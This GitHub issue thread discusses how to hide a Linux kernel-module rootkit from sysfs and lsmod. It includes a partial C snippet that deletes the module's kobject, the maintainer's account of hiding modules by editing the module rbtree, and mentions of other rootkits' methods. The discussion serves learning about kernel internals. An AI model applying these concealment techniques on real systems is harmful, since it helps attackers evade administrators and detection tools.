### ISSUE TITLE
LKM Rootkit module hiding from sysfs

### ISSUE THREAD

**Issue by lil-skelly** [croemheld/lkm-rootkit#3]
I recently discovered your LKM Rootkit and thought you could shine some light on a problem I'm facing.

I am seeking clarification on effectively hiding and revealing a module within the sysfs. I have implemented a code snippet for this purpose, which successfully hides the module; however, when attempting to show the module again, the directory in /sys/module/[MODULE] is recreated but is empty, lacking critical files necessary for unloading the module.

The following code snippet is my current approach:

#include <linux/init.h>
#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/kobject.h>
#include <linux/sysfs.h>

static struct list_head *prev_kobj_entry;

static struct kobj_type *ktype;

const char *name;
struct kobject mod_kobj;
struct kobject *parent;
struct kobject new_kobj;

static void sys_hide(void)
{
  // Get the kobj of THIS_MODULE
   mod_kobj = (((struct module *)(THIS_MODULE))->mkobj).kobj;

   // Save the current kobject previous entry
   prev_kobj_entry = mod_kobj.entry.prev;
   
   // get name, parent, ktype from mod_kobj
   name = mod_kobj.name;
   parent = mod_kobj.parent;
   ktype = mod_kobj.ktype;     

   // Remove kobject from the sysfs
   kobject_del(&mod_kobj);
}

static void sys_show(void)
{
   kobject_init_and_add(&new_kobj, ktype, parent, name);
}

A workaround I have in mind is to keep a copy of the kobj.ktype struct of the module before deleting it, which has a default_group struct containing the attributes of a module, which I can then feed to the sysfs API to create the files based on the attributes.
 
Although that sounds like quite a hassle.
Then I discovered your technique which removes the rbtree entries.
Does this take care of the issue? Are the files in /sys/module/[MODULE] restored? 
Why does this approach work and mine doesn't? 

If you were kind enough to answer those questions, I would appreciate it. 
You see, I am trying to learn more about LKMs, rootkits, and the Linux kernel as a whole, and this problem troubles me.

**Comment by croemheld** [comment]
Hi @lil-skelly , sorry for my late answer on this issue. Unfortunately, I haven’t checked in on this project for quite some time already, but I‘ll try to explain as far as I remember.

My goal was to hide the modules being shown when using the `lsmod` command. This worked quite well, but since the rootkit itself is dependent on two other modules, I had to hide these as well. My solution worked quite well, the modules were indeed hidden from the `lsmod` output. 

I don‘t exactly remember the process on how I arrived at manipulating the rbtree, but I did try a similar approach with the kobjects you described. Ultimately it didn’t work out well with this approach, so I never continued looking into that method after that again. My rationale was to change the perception on how the module was listed, without having to delete or move any files, which I thought is achieved by only manipulating the rbtree.

**Comment by lil-skelly** [comment]
No worries and thanks for answering. After doing some research I discovered the KoVID kit which successfully hides from the sysfs by storing important attributes that allow the LKM to recreate the required sys entries.
But yesterday, I came across a paper (can't find it atm) which just sets some pointers to NULL and works.

**Comment by croemheld** [comment]
In case you happen to find it again, please do name it, even though I’m already a bit out of this research topic, I’m always interested in learning something new!
